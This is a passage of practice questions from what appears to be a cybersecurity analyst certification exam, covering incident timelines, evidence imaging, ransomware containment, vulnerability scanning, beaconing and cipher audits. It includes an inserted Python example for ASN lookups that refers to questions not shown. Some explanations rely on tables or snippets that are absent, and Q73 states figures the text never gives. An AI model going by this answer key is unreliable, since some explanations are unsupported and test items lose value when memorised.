A well-defined timeline of the events is the most important factor to ensure accurate incident response reporting, as it provides a clear and chronological account of what happened, when it happened, who was involved, and what actions were taken. A timeline helps to identify the root cause of the incident, the impact and scope of the damage, the effectiveness of the response, and the lessons learned for future improvement. A timeline also helps to communicate the incident to relevant stakeholders, such as management, legal, regulatory, or media entities. The other factors are also important for incident response reporting, but they are not as essential as a well-defined timeline.
Official Reference:
https://www.ibm.com/topics/incident-response
https://www.crowdstrike.com/cybersecurity-101/incident-response/incident-response-steps/

Question: 71
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall
Answer: A
Explanation:
Geoblocking is the best mitigation technique for unusual network scanning activity coming from a country that the company does not do business with, as it can prevent any potential attacks or data breaches from that country. Geoblocking is the practice of restricting access to websites or services based on geographic location, usually by blocking IP addresses associated with a certain country or region. Geoblocking can help reduce the overall attack surface and protect against malicious actors who may be trying to exploit vulnerabilities or steal information. The other options are not as effective as geoblocking, as they may not block all the possible sources of the scanning activity, or they may not address the root cause of the problem.
Official Reference:
https://www.blumira.com/geoblocking/
https://www.avg.com/en/signal/geo-blocking

Question: 72
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
A. Disable the user's network account and access to web resources
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user's network share.
D. Make a forensic image of the device and create a SHA-1 hash.
Answer: D
Explanation:
Making a forensic image of the device and creating a SHA-1 hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SHA-1 hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SHA-1 hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity.
Official Reference:
https://www.sans.org/blog/forensics-101-acquiring-an-image-with-ftk-imager/
https://swailescomputerforensics.com/digital-forensics-imaging-hash-value/

Question: 73
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:
Which of the following should the security analyst prioritize for remediation?
A. rogers
B. brady
C. brees
D. manning
Answer: B
Explanation:
Brady should be prioritized for remediation, as it has the highest risk score and the highest number of affected users. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Brady has a risk score of 9 x 0.8 = 7.2, which is higher than any other system. Brady also has 500 affected users, which is more than any other system. Therefore, patching brady would reduce the most risk and impact for the organization. The other systems have lower risk scores and lower numbers of affected users, so they can be remediated later.
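Returning to the shell functions in questions 64 and 65 above, here is an added Python example (not code from the original study material) that reproduces the origin.asn.cymru.com lookup behind function y(): it builds the reversed-octet query name that the dig -x / awk pipeline yields, parses the TXT answer into ASN, prefix and country code, and groups addresses by ASN and country (question 64) or by country alone (question 65). The DNS answers are constructed sample data rather than live responses, and the resolver hook is an assumption so the script runs offline.

```python
"""Added example, not code from the original study material: the two-step
origin.asn.cymru.com lookup behind question 64's function y(), written in
Python so the query-name construction and the TXT answer layout are visible,
followed by the grouping that questions 64 and 65 ask for."""
import ipaddress
from collections import defaultdict

CYMRU_ZONE = "origin.asn.cymru.com"


def origin_query_name(ip: str) -> str:
    """Reverse the IPv4 octets and append the Cymru zone, which is what the
    dig -x | awk -F ".in-addr" pipeline in the question extracts from the
    PTR name (4.4.8.8.in-addr.arpa -> 4.4.8.8)."""
    addr = ipaddress.IPv4Address(ip)  # raises ValueError on malformed input
    reversed_octets = ".".join(reversed(str(addr).split(".")))
    return f"{reversed_octets}.{CYMRU_ZONE}"


# Constructed TXT answers in the documented Cymru layout:
# "ASN | BGP prefix | country code | registry | allocation date".
# Addresses come from the RFC 5737 documentation ranges and ASNs from the
# RFC 5398 documentation range; none of this is live data.
SAMPLE_TXT_ANSWERS = {
    "10.100.51.198." + CYMRU_ZONE: '"64496 | 198.51.100.0/24 | US | arin | 2001-04-01"',
    "20.100.51.198." + CYMRU_ZONE: '"64496 | 198.51.100.0/24 | US | arin | 2001-04-01"',
    "7.113.0.203." + CYMRU_ZONE: '"64497 | 203.0.113.0/24 | DE | ripencc | 2003-11-14"',
    "9.113.0.203." + CYMRU_ZONE: '"64498 | 203.0.113.0/24 | DE | ripencc | 2003-11-14"',
}


def parse_origin_txt(txt: str) -> dict:
    """Split one Cymru TXT answer into named fields. A multi-origin prefix
    lists several ASNs separated by spaces; the first one is kept."""
    fields = [f.strip() for f in txt.strip().strip('"').split("|")]
    if len(fields) != 5:
        raise ValueError(f"unexpected Cymru answer: {txt!r}")
    asn, prefix, cc, registry, allocated = fields
    return {"asn": int(asn.split()[0]), "prefix": prefix, "cc": cc,
            "registry": registry, "allocated": allocated}


def lookup_origin(ip: str, resolver=SAMPLE_TXT_ANSWERS.get) -> dict:
    """resolver maps a query name to its TXT answer (or None). The default is
    the sample table above; for live use, substitute a DNS client call."""
    answer = resolver(origin_query_name(ip))
    if answer is None:
        raise LookupError(f"no origin record for {ip}")
    return parse_origin_txt(answer)


def group_ips(ips, key=lambda info: (info["asn"], info["cc"])) -> dict:
    """Group addresses by (ASN, country) as in question 64; pass
    key=lambda info: info["cc"] for the country-only view of question 65."""
    groups = defaultdict(list)
    for ip in ips:
        groups[key(lookup_origin(ip))].append(ip)
    return dict(groups)


if __name__ == "__main__":
    sample = ["198.51.100.10", "203.0.113.7", "198.51.100.20", "203.0.113.9"]
    for group, members in group_ips(sample).items():
        print(f"AS{group[0]} {group[1]}: {', '.join(members)}")
```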
Question: 74
A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
Which of the following vulnerability types is the security analyst validating?
A. Directory traversal
B. XSS
C. XXE
D. SSRF
Answer: B
Explanation:
XSS (cross-site scripting) is the vulnerability type that the security analyst is validating, as the snippet shows an attempt to inject a script tag into the web application. XSS is a web security vulnerability that allows an attacker to execute arbitrary JavaScript code in the browser of another user who visits the vulnerable website. XSS can be used to perform various malicious actions, such as stealing cookies, session hijacking, phishing, or defacing websites. The other vulnerability types are not relevant to the snippet, as they involve different kinds of attacks. Directory traversal is an attack that allows an attacker to access files and directories that are outside of the web root folder. XXE (XML external entity) injection is an attack that allows an attacker to interfere with an application’s processing of XML data, and potentially access files or systems. SSRF (server-side request forgery) is an attack that allows an attacker to induce the server-side application to make requests to an unintended location.
Official Reference:
https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/ssrf
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Question: 75
During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?
A. Shut down the server.
B. Reimage the server
C. Quarantine the server
D. Update the OS to latest version.
Answer: C
Explanation:
Quarantining the server is the best action to perform immediately, as it isolates the affected server from the rest of the network and prevents the ransomware from spreading to other systems or data. Quarantining the server also preserves the evidence of the ransomware attack, which can be useful for forensic analysis and law enforcement investigation. The other actions are not as urgent as quarantining the server, as they may not stop the ransomware infection, or they may destroy valuable evidence. Shutting down the server may not remove the ransomware, and it may trigger a data deletion mechanism by the ransomware. Reimaging the server may restore its functionality, but it will also erase any traces of the ransomware and make recovery of encrypted data impossible. Updating the OS to the latest version may fix some vulnerabilities, but it will not remove the ransomware or decrypt the data.
Official Reference:
https://www.cisa.gov/stopransomware/ransomware-guide
https://www.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf
https://www.cisa.gov/stopransomware/ive-been-hit-ransomware

Question: 76
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
A. Operating system version
B. Registry key values
C. Open ports
D. IP address
Answer: B
Explanation:
Registry key values would be missing from a scan performed with this configuration, as the scanner appliance would not have access to the Windows Registry of the scanned systems. The Windows Registry is a database that stores configuration settings and options for the operating system and installed applications.
To scan the Registry, the scanner would need to have credentials to log in to the systems and run a local agent or script. The other items would not be missing from the scan, as they can be detected by the scanner appliance without credentials. Operating system version can be identified by analyzing service banners or fingerprinting techniques. Open ports can be discovered by performing a port scan or sending probes to common ports. IP address can be obtained by resolving the hostname or using network discovery tools.
Official Reference:
https://attack.mitre.org/techniques/T1112/

Question: 77
A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?
A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan
Answer: A
Explanation:
A credentialed scan is a type of vulnerability scan that uses valid credentials to log in to the scanned systems and perform a more thorough and accurate assessment of their vulnerabilities. A credentialed scan can access more information than a non-credentialed scan, such as registry keys, patch levels, configuration settings, and installed applications. A credentialed scan can also reduce the number of false positives and false negatives, as it can verify the actual state of the system rather than relying on inference or assumptions. The other types of scans are not related to the issue of incomplete findings, as they refer to different aspects of vulnerability scanning, such as the scope, location, or frequency of the scan. An external scan is a scan that is performed from outside the network perimeter, usually from the internet. An external scan can reveal how an attacker would see the network and what vulnerabilities are exposed to the public. An external scan cannot access internal systems or resources that are behind firewalls or other security controls.
A differential scan is a scan that compares the results of two scans and highlights the differences between them. A differential scan can help identify changes in the network environment, such as new vulnerabilities, patched vulnerabilities, or new devices. A differential scan does not provide a complete list of findings by itself, but rather a summary of changes. A network scan is a scan that focuses on the network layer of the OSI model and detects vulnerabilities related to network devices, protocols, services, and configurations. A network scan can discover open ports, misconfigured firewalls, unencrypted traffic, and other network-related issues. A network scan does not provide information about the application layer or the host layer of the OSI model, such as web applications or operating systems.

Question: 78
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing
Answer: D
Explanation:
Beaconing is the best term to describe the activity that is taking place, as it refers to the periodic communication between an infected host and a blocklisted external server. Beaconing is a common technique used by malware to establish a connection with a command-and-control (C2) server, which can provide instructions, updates, or exfiltration capabilities to the malware. Beaconing can vary in frequency, duration, and payload, depending on the type and sophistication of the malware. The other terms are not as accurate as beaconing, as they describe different aspects of malicious activity. Data exfiltration is the unauthorized transfer of data from a compromised system to an external destination, such as a C2 server or a cloud storage service.
Data exfiltration can be a goal or a consequence of malware infection, but it does not necessarily involve blocklisted servers or consistent requests. A rogue device is a device that is connected to a network without authorization or proper security controls. Rogue devices can pose a security risk, as they can introduce malware, bypass firewalls, or access sensitive data. However, rogue devices are not necessarily infected with malware or communicating with blocklisted servers. Scanning is the process of probing a network or a system for vulnerabilities, open ports, services, or other information. Scanning can be performed by legitimate administrators or malicious actors, depending on the intent and authorization. Scanning does not imply consistent requests or blocklisted servers, as it can target any network or system.

Question: 79
A technician is analyzing output from a popular network mapping tool for a PCI audit:
Which of the following best describes the output?
A. The host is not up or responding.
B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed
Answer: C
Explanation:
The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along w